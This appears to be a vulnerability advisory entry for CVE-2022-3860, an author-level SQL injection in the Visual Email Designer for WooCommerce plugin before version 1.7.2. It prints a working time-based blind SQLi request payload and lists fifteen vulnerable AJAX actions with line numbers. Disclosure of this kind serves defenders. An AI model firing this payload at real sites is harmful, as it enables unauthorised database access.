Lucene search
Donato Di Pasquale & Francesco MaranoWPEX-ID:D99CE21F-FBB6-429C-AA3B-19C4A5EB7557HistoryDec 09, 2022 - 12:00 a.m.
Visual Email Designer for WooCommerce < 1.7.2 - Multiple Author+ SQLi
2022-12-0900:00:00
Donato Di Pasquale & Francesco Marano
201
email designer
woocommerce
sql injection
0.001 Low
EPSS
Percentile
31.3%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author.
action={INSERT HERE NAME OF ACTION}&swcm_social_id=socialblockdrag_XpoeK&template_type=user%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)&template_id=2&theme_id=2&securekey=dd041b294f
Action: swcm_social_function ⇒ SQLi at line: 2725
Action: swcm_video_function ⇒ SQLi at line 2510
Action: swcm_footer_function ⇒ SQL at line 2311
Action: swcm_disclaimer_function ⇒ SQLi at line 2537
Action: swcm_image_function ⇒ SQLi at line 2621
Action: swcm_customer_function ⇒ SQLi at line 2940
Action: swcm_delete_widget = SQLi at line 3018
Action: swcm_hr_function = SQLi at line 2423
Action: swcm_maintext_function ⇒ SQLi at line 2339
Action: swcm_multi_image_function ⇒ SQLi at line 2653
Action: swcm_button_function ⇒ SQLi at line 2482
Action: swcm_title_function ⇒ SQLi at line 2596
Action: swcm_clone_widget ⇒ SQLi at line 3087
Action: swcm_order_function ⇒ SQLi at line 2994
Action: swcm_textarea_function ⇒ SQLi at line 2284Related
wpvulndb
wpvulndb
Visual Email Designer for WooCommerce < 1.7.2 - Multiple Author+ SQLi
2022-12-09 00:00:00
cvelist
cvelist
nvd
nvd
CVE-2022-3860
2023-01-02 22:15:15
cve
cve
CVE-2022-3860
2023-01-02 22:15:15
prion
prion
Sql injection
2023-01-02 22:15:00